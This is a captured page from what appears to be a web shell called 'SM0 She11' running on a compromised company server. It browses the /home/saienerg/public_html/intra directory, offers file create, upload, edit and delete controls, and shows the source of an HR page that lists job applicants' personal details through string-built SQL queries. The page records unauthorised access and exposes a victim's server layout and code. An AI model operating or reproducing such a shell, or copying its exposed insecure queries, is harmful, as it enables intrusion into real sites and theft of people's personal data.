SM0 She11
Path:
/
/
home
/
saienerg
/
public_html
/
intra
Full Path (server): /home/saienerg/public_html/intra
Create Fil3
Upl04d Fil3
📄 ajax1.php
[E]
[D]
[R]
📄 article_list.php
[E]
[D]
[R]
📁 assets
Open
[D]
[R]
📁 career
Open
[D]
[R]
📄 career_enquiries.php
[E]
[D]
[R]
📄 cat_load.php
[E]
[D]
[R]
📁 change
Open
[D]
[R]
📄 cmn_lib.php
[E]
[D]
[R]
📄 common.php
[E]
[D]
[R]
📄 compressImage.php
[E]
[D]
[R]
📄 config.php
[E]
[D]
[R]
📁 css
Open
[D]
[R]
📁 dashboard
Open
[D]
[R]
📁 data
Open
[D]
[R]
📁 fonts
Open
[D]
[R]
📄 foo_scripts.php
[E]
[D]
[R]
📄 foo_scripts1.php
[E]
[D]
[R]
📄 footer.php
[E]
[D]
[R]
📄 footer1.php
[E]
[D]
[R]
📄 form.php
[E]
[D]
[R]
📁 gallery
Open
[D]
[R]
📄 getExtension.php
[E]
[D]
[R]
📄 header.php
[E]
[D]
[R]
📄 header1.php
[E]
[D]
[R]
📁 hrrepo
Open
[D]
[R]
📁 images
Open
[D]
[R]
📁 includes
Open
[D]
[R]
📄 index.php
[E]
[D]
[R]
📄 index1.php
[E]
[D]
[R]
📄 kis_config.php
[E]
[D]
[R]
📄 login.php
[E]
[D]
[R]
📄 logout.php
[E]
[D]
[R]
📁 masters
Open
[D]
[R]
📁 others
Open
[D]
[R]
📁 perfomances
Open
[D]
[R]
📁 products
Open
[D]
[R]
📄 products.js
[E]
[D]
[R]
📁 services
Open
[D]
[R]
📄 sidebar.php
[E]
[D]
[R]
📄 sidebar1.php
[E]
[D]
[R]
📄 spel_config.php
[E]
[D]
[R]
📄 top_nav.php
[E]
[D]
[R]
📄 top_nav1.php
[E]
[D]
[R]
📁 users
Open
[D]
[R]
Editing: career_enquiries.php
<!doctype html> <html lang="en"> <head> <?php include('../header.php'); ?> </head> <body> <div class="wrapper"> <?php include('../sidebar.php'); ?> <div class="main-panel"> <?php include('../top_nav.php'); ?> <div class="content"> <div class="container-fluid"> <div class="row"> <div class="col-md-6"><div class="header"> <h3 class="adtt">HR REPOSITORY</h3> </div> </div> <div class="col-md-6"> <ul class="breadcrumb"> <li class="active" ><a >Resumes Received - Website</a></li> </ul> </div> </div> <!--------add------> <!-----List--------> <div class="row"> <div class="col-md-12"> <div class="card"> <div class="header"> <h3 class="lstt">Resumes Received - Website</h3> </div> <div class="content"> <div class="row"> <div class="col-md-12"> <table id="example" class="table table-striped table-bordered" style="width:100%"> <thead> <tr> <th width="15%" id="hed">S No.</th> <th width="61%" id="hed">Job Title & Code</th> <th width="24%" id="hed">Applicant Name</th> <th width="24%" id="hed">Address</th> <th width="24%" id="hed">Mobile No.</th> <th width="24%" id="hed">E-mail</th> <th width="24%" id="hed">Experience Status</th> <th width="24%" id="hed">Qualification</th> <th width="24%" id="hed">Applied On</th> </tr> </thead> <tbody> <?php $fqry=mysqli_query($idb,"SELECT * FROM career_enquiries where status='0'" ); $rws3= mysqli_num_rows($fqry); $sno='1'; while($fr1=mysqli_fetch_array($fqry)) { $vcn_id=$fr1['vcn_id']; $q1=mysqli_query($idb,"select * from vacancy_list where vcn_id='$vcn_id' "); $f1=mysqli_fetch_array($q1); $jpos_id=$f1['jpos_id']; $jb_cod=$f1['jb_code']; $job_tle = $obj->get_job_position($jpos_id); if($exprn_sts>0) { $exprn = 'Experienced'; }else{ $exprn = 'Fresher'; } ?> <tr> <td align="center"><?php echo $sno ?></td> <td><?php echo $job_tle; echo $jb_cod; ?></td> <td align="center"><?php echo $fr1['aplnt_nme']; ?> </td> <td align="center"><?php echo $fr1['adrs1']; echo $fr1['adrs2']; echo $fr1['city']; echo $fr1['state']; echo $fr1['cntry']; echo $fr1['pin']; ?></td> <td align="center"><?php echo $fr1['aplnt_eml']; ?></td> <td align="center"><?php echo $fr1['mob_no']; ?></td> <td align="center"><?php echo $exprn; ?></td> <td align="center"><?php echo $job_tle = $obj->get_edu_qualification($fr1['eql_id']) ; ?></td> <td align="center"><?php echo date('d/m/Y', $fr1['enq_stm']); ?></td> </tr> <?php $sno=$sno+1; } ?> </tbody> </table> </div> </div> </div> </div> </div> </div> </div> </div> <!----------model Dialog --------> <div class="modal fade" id="viewModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title" id="defaultModalLabel">View Product Details</h4> </div> <div class="modal-body"> </div> <div class="modal-footer"> <button class="btn btn-danger btn-fill" type="button" id="cncl1" data-dismiss="modal" > <i class="glyphicon glyphicon-remove-sign"></i><span> Close</span></button> <!-- <button class="btn btn-success btn-fill" type="button" id="srcat_edt" > <i class="glyphicon glyphicon-ok-sign"></i> Update</button> --> </div> </form> </div> </div> </div> <div class="modal fade" id="aprvModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title" id="defaultModalLabel">Approve Product Details</h4> </div> <div class="modal-body"> Are you confirm to approve this Product? </div> <div class="modal-footer"> <button class="btn btn-danger btn-fill" type="button" id="cncl1" data-dismiss="modal" > <i class="glyphicon glyphicon-remove-sign"></i><span> Close</span></button> <button class="btn btn-success btn-fill" type="button" id="aprv_prd" > <i class="glyphicon glyphicon-ok-sign"></i> Approve</button> </div> </form> </div> </div> </div> <div class="modal fade" id="rjctModal" tabindex="-1" role="dialog"> <div class="modal-dialog" role="document"> <div class="modal-content"> <div class="modal-header"> <h4 class="modal-title" id="defaultModalLabel">Re-edit Product Details</h4> </div> <div class="modal-body"> Are you confirm to Re-edit this Product? </div> <div class="modal-footer"> <button class="btn btn-danger btn-fill" type="button" id="cncl1" data-dismiss="modal" > <i class="glyphicon glyphicon-remove-sign"></i><span> Close</span></button> <button class="btn btn-success btn-fill" type="button" id="re_edit_prd" > <i class="glyphicon glyphicon-ok-sign"></i> Confirm</button> </div> </form> </div> </div> </div> <!-----------//-------------------> <input name="prd_id" id="prd_id" type="hidden"> <!-----------//-------------------> <?php include('../footer.php'); ?> </div> </div> <?php include('../foo_scripts.php'); ?> <script type="text/javascript" src="../includes/js/products.js"> </script> <script type="text/javascript"> ///modal box $(document).ready(function() { var table = $('#example').DataTable( { "ordering": false // responsive: true } ); ///cancel $('#cncl,#cncl1').click(function(){ // window.location.href ="productslist.php"; $('.modal').modal('hide'); }); } ); $(document).on("click",".aprv_btn", function () { $('#aprvModal').modal({show:true}); var id=$(this).attr("data-id"); $('#prd_id').val(id); }); $(document).on("click",".rjct_btn", function () { $('#rjctModal').modal({show:true}); var id=$(this).attr("data-id"); $('#prd_id').val(id); }); $(document).on("click",".view_btn", function () { var id=$(this).attr("data-id"); var nme = $(this).closest('tr').find('td:eq(1)').text(); var typ = $(this).closest('tr').find('td:eq(2)').text(); var descr = $(this).closest('tr').find('td:eq(3)').text(); $('#viewModal .modal-body ').load('load_product.php?id='+id,function(){ $('#viewModal').modal({show:true}); }); //alert(id); // $('#viewModal').modal('show'); $('#prd_id').val(id); $('#nme1').html(nme); $('#typ1').html(typ); $('#descr1').html(nme); }); $(document).on("click","#re_edit_prd", function () { var id=$('#prd_id').val(); $.ajax({ url:"products_sql.php", data: { redit_prd: id }, type:'GET', success:function(result) { // alert(result); if(result== '1') { alert('Record updated Sucessfully!'); window.location.href='productslist.php'; //location.reload(); }else { alert('Operation Failed!'); return false; } } }); }); $(document).on("click","#aprv_prd", function () { //$('#rpt_tbl').on( 'click', '.del_btn', function (e) { var id=$('#prd_id').val(); // if (confirm("Do you want to Confirm \u275B Delete \u275C ?") ) //if (confirm("Are you approving this service ?") ) //{ $.ajax({ url:"products_sql.php", data: { aprv_prd: id }, type:'GET', success:function(result) { // alert(result); if(result== '1') { alert('Record updated Sucessfully!'); window.location.href='productslist.php'; //location.reload(); }else { alert('Operation Failed!'); return false; } } }); }); </script> </body> </html>
Save